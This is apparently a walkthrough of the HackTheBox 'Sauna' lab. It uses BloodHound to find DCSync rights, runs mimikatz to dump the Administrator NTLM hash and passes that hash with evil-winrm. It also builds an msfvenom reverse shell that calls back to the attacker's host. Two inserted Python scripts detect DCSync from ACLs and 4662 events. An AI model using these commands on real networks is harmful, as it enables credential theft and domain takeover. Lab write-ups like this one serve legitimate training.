Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/25/2023   1:20 PM          11690 20230825132046_BloodHound.zip
-a----        8/25/2023   1:18 PM        1046528 SharpHound.exe
-a----        8/25/2023  12:58 PM        2387968 winPEASx64.exe
-a----        8/25/2023   1:20 PM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230825132046_BloodHound.zip

Launch bloodhound

                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ bloodhound

But before that, we need to start neo4j and set its password.


┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ sudo neo4j console         
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-08-25 13:25:56.918+0000 INFO  Starting...
2023-08-25 13:25:57.564+0000 INFO  This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
2023-08-25 13:25:59.855+0000 INFO  ======== Neo4j 4.4.16 ========
2023-08-25 13:26:04.131+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-08-25 13:26:04.154+0000 INFO  Setting up initial user from defaults: neo4j
2023-08-25 13:26:04.155+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-08-25 13:26:04.181+0000 INFO  Setting version for 'security-users' to 3
2023-08-25 13:26:04.188+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-08-25 13:26:04.197+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-08-25 13:26:04.656+0000 INFO  Bolt enabled on localhost:7687.
2023-08-25 13:26:06.692+0000 INFO  Remote interface available at http://localhost:7474/
2023-08-25 13:26:06.699+0000 INFO  id: 09D349E0C9FBBE2765953B684D37451EC5B3E5498A047128F86F8D612D552499
2023-08-25 13:26:06.700+0000 INFO  name: system
2023-08-25 13:26:06.700+0000 INFO  creationDate: 2023-08-25T13:26:01.864Z
2023-08-25 13:26:06.700+0000 INFO  Started.


Go to http://localhost:7474/ and change the default neo4j password.

Log in to BloodHound with that username/password.

Drag and drop the zip file into BloodHound.

Type svc in the search box at the top. Then do the same for fsmith.

Mark svc_loanmgr and fsmith as owned.

Go to Queries and run Shortest Paths from Owned Principals.

Click on Find Principals with DCSync Rights, then right-click on the link.

We can use mimikatz for DCSync; Impacket also has a DCSync implementation (secretsdump.py).
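BloodHound's "Find Principals with DCSync Rights" query shows who holds the replication rights that make DCSync possible; the defender's version of that question, plus detection of the operation itself, is sketched below as an added example (not part of the writeup, BloodHound or mimikatz). The ACE list and 4662 event records are constructed; the three control access right GUIDs, the 0x100 control-access mask and the event field names are the documented ones.

```python
"""Defender's view of the DCSync step in this writeup: who is allowed to
ask a DC for replication data, and who actually did.

Added example (not part of the original writeup, BloodHound or mimikatz).
SAMPLE_ACES and SAMPLE_4662 are constructed records; the three control
access right GUIDs are the documented replication rights. 4662 events are
only produced when Directory Service Access auditing is enabled and the
domain object carries a SACL covering control access."""

# Control access rights that together make DCSync possible. A principal
# needs Get-Changes plus Get-Changes-All to pull password hashes.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DCSYNC_MINIMUM = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}

DOMAIN_NC = "DC=EGOTISTICAL-BANK,DC=LOCAL"
# Principals expected to replicate: the DC's computer account and the
# built-in groups that hold the rights by default.
EXPECTED_REPLICATORS = {"SAUNA$", "Domain Controllers", "Enterprise Domain Controllers",
                        "Administrators", "Enterprise Admins", "Domain Admins"}

# Constructed ACL extract for the domain NC: (trustee, allowed right GUID).
SAMPLE_ACES = [
    ("Domain Controllers", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ("Domain Controllers", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("Administrators", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ("Administrators", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("svc_loanmgr", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ("svc_loanmgr", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("fsmith", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),  # Get-Changes alone is not enough
]

# Constructed 4662 records using the real EventData field names.
# AccessMask 0x100 is Control Access; 0x10 is an ordinary Read Property.
SAMPLE_4662 = [
    {"SubjectUserName": "SAUNA$", "ObjectName": DOMAIN_NC, "AccessMask": "0x100",
     "Properties": {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}},
    {"SubjectUserName": "svc_loanmgr", "ObjectName": DOMAIN_NC, "AccessMask": "0x100",
     "Properties": {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}},
    {"SubjectUserName": "fsmith", "ObjectName": "CN=FSmith,CN=Users," + DOMAIN_NC,
     "AccessMask": "0x10",
     "Properties": {"bf967aba-0de6-11d0-a285-00aa003049e2"}},  # user class GUID, plain read
]


def dcsync_capable(aces):
    """Trustees holding both replication rights on the naming context,
    i.e. the set BloodHound's 'Find Principals with DCSync Rights' draws."""
    held = {}
    for trustee, guid in aces:
        if guid in REPLICATION_RIGHTS:
            held.setdefault(trustee, set()).add(REPLICATION_RIGHTS[guid])
    return sorted(t for t, rights in held.items() if DCSYNC_MINIMUM <= rights)


def unexpected_dcsync_holders(aces, expected=EXPECTED_REPLICATORS):
    """Capable trustees that are neither DCs nor built-in admin groups."""
    return [t for t in dcsync_capable(aces) if t not in expected]


def find_dcsync_events(events, expected=EXPECTED_REPLICATORS):
    """4662 operations exercising a replication right from a principal that
    is not a DC or a built-in admin group: the footprint of a DCSync."""
    hits = []
    for e in events:
        rights = sorted(REPLICATION_RIGHTS[g] for g in e["Properties"]
                        if g in REPLICATION_RIGHTS)
        if rights and e["SubjectUserName"] not in expected:
            hits.append((e["SubjectUserName"], e["ObjectName"], rights))
    return hits


if __name__ == "__main__":
    print("Non-default DCSync holders:", unexpected_dcsync_holders(SAMPLE_ACES))
    for subject, obj, rights in find_dcsync_events(SAMPLE_4662):
        print(f"[DCSync] {subject} replicated {obj} using {', '.join(rights)}")
```

The ACL check is the preventive side (strip the two rights from any service account that does not need them); the 4662 check is the detective side, and it is also what catches secretsdump.py's DRSUAPI method, since both tools perform the same replication request.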

Option 1: using mimikatz. Uploaded mimikatz to the Windows machine. The binary can be found at https://github.com/ParrotSec/mimikatz

This didn't work when running mimikatz; it got stuck in a loop.

Using Impacket: secretsdump.py

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]                                                      


Impacket secretsdump.py failed numerous times with permission denied

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create "sessionresume_qmeaJHgo" resume session file: [Errno 13] Permission denied: 'sessionresume_qmeaJHgo'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]


Going back to try the mimikatz route, but this time using Invoke-Mimikatz.ps1.

I got this with wget from https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 and then uploaded it to the machine.


┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
--2023-08-27 06:29:42--  https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 677282 (661K) [text/plain]
Saving to: ‘Invoke-Mimikatz.ps1’

Invoke-Mimikatz.ps1                                  100%[===================================================================================================================>] 661.41K  --.-KB/s    in 0.07s   

2023-08-27 06:29:42 (8.71 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [677282/677282]

                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Sauna]

Upload and run it on the machine.

There were issues running Invoke-Mimikatz, but I found this article: https://github.com/mitre/caldera/issues/38


Change the following line 886:  
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')`

To

`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);`

With this change it worked. Use the user svc_loanmgr.

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1
                                        
Info: Uploading /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1 to C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1
                                        
Data: 3215032 bytes of 3215032 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator"'
Access denied 
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2579 char:27
+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: SAUNA.EGOTISTICAL-BANK.LOCAL / S-1-5-21-2966785786-3096785034-1186376766

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Now we can pass the hash: authenticate as Administrator using the NTLM hash 823452073d75b9d1cf70ebdf86c7f98e in place of a password.
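As an added defensive example (not part of this walkthrough), the DCSync request shown above is visible on the domain controller as Security event 4662 naming the replication extended-rights GUIDs. The script below, run over constructed event lines flattened to a simplified `Key=Value` layout (an assumption made for this example), flags any non-DC account that exercised those rights on the domain object.

```python
"""Flag DCSync-style replication requests in Windows Security 4662 events."""
import re

# Extended-rights GUIDs a DCSync (lsadump::dcsync) caller must hold on the
# domain object; the DC logs a 4662 listing them when replication is requested.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS_MASK = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def parse_event(line: str) -> dict:
    """Turn one flattened 'Key=Value Key="Value"' event line into a dict."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def is_replication_peer(account: str) -> bool:
    """Domain controller machine accounts (NAME$) legitimately replicate."""
    return account.endswith("$")


def detect_dcsync(lines):
    """Return {account: sorted replication GUIDs} for non-DC principals that
    exercised a replication control-access right on the domain object."""
    hits = {}
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662" or ev.get("ObjectType") != "domainDNS":
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS_MASK == 0:
            continue
        guids = {g.lower() for g in GUID.findall(ev.get("Properties", ""))}
        wanted = guids & REPLICATION_GUIDS
        actor = ev.get("SubjectUserName", "")
        if wanted and not is_replication_peer(actor):
            hits.setdefault(actor, set()).update(wanted)
    return {a: sorted(g) for a, g in hits.items()}


# Constructed sample events (flattened for this example; not real log output).
SAMPLE_EVENTS = [
    'EventID=4662 SubjectUserName=SAUNA$ ObjectType=domainDNS AccessMask=0x100 '
    'ObjectName=DC=EGOTISTICAL-BANK,DC=LOCAL Properties="Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 SubjectUserName=svc_loanmgr ObjectType=domainDNS AccessMask=0x100 '
    'ObjectName=DC=EGOTISTICAL-BANK,DC=LOCAL Properties="Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 SubjectUserName=svc_loanmgr ObjectType=domainDNS AccessMask=0x100 '
    'ObjectName=DC=EGOTISTICAL-BANK,DC=LOCAL Properties="Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 SubjectUserName=svc_loanmgr ObjectType=user AccessMask=0x10 '
    'Properties="Read Property {bf967aba-0de6-11d0-a285-00aa003049e2}"',
    'EventID=4624 SubjectUserName=svc_loanmgr LogonType=3',
]

if __name__ == "__main__":
    for account, guids in detect_dcsync(SAMPLE_EVENTS).items():
        print(f"DCSync suspect: {account} -> {guids}")
```

Real 4662 records carry the same fields, but as a multi-line XML/EVTX body rather than one line; only the parse_event step needs adapting for a production feed.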

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e~  
                                        
Evil-WinRM shell v3.5
                                        
Error: Invalid hash format
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020   3:11 PM                3D Objects
d-r---        1/23/2020   3:11 PM                Contacts
d-r---        7/14/2021   3:35 PM                Desktop
d-r---        1/23/2020   3:11 PM                Documents
d-r---        1/23/2020   3:11 PM                Downloads
d-r---        1/23/2020   3:11 PM                Favorites
d-r---        1/23/2020   3:11 PM                Links
d-r---        1/23/2020   3:11 PM                Music
d-r---        1/23/2020   3:11 PM                Pictures
d-r---        1/23/2020   3:11 PM                Saved Games
d-r---        1/23/2020   3:11 PM                Searches
d-r---        1/23/2020   3:11 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/27/2023   9:38 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f2d1be3960ce7c6cde8ab677b5713616
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

We will try running mimikatz, which was initially failing under Evil-WinRM. To do this we spawn a reverse shell and run it from our Kali machine.

Create a reverse shell payload with msfvenom, then upload it to the machine:

┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/shell.exe
                                        
Info: Uploading /home/kali/HTB/Sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe

Run the reverse shell with a listener waiting on Kali:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\shell.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 


and on the Kali side the listener receives the connection:

listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\svc_loanmgr\Documents>


Upload and run mimikatz.exe from the reverse shell; this works, and we get the same Administrator hash to pass.


┌──(kali㉿kali)-[~]
└─$ nc -nlvp 443 
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\svc_loanmgr\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\svc_loanmgr\Documents

08/27/2023  12:20 PM    <DIR>          .
08/27/2023  12:20 PM    <DIR>          ..
08/27/2023  11:39 AM         2,411,274 Invoke-Mimikatz.ps1
08/27/2023  12:21 PM           927,384 mimikatz.exe
08/27/2023  12:08 PM            73,802 reverse.exe
08/27/2023  12:01 PM            73,802 reverse_shell.exe
08/27/2023  12:18 PM             7,168 shell.exe
               5 File(s)      3,493,430 bytes
               2 Dir(s)   7,828,529,152 bytes free

C:\Users\svc_loanmgr\Documents>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 7/26/2021 9:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e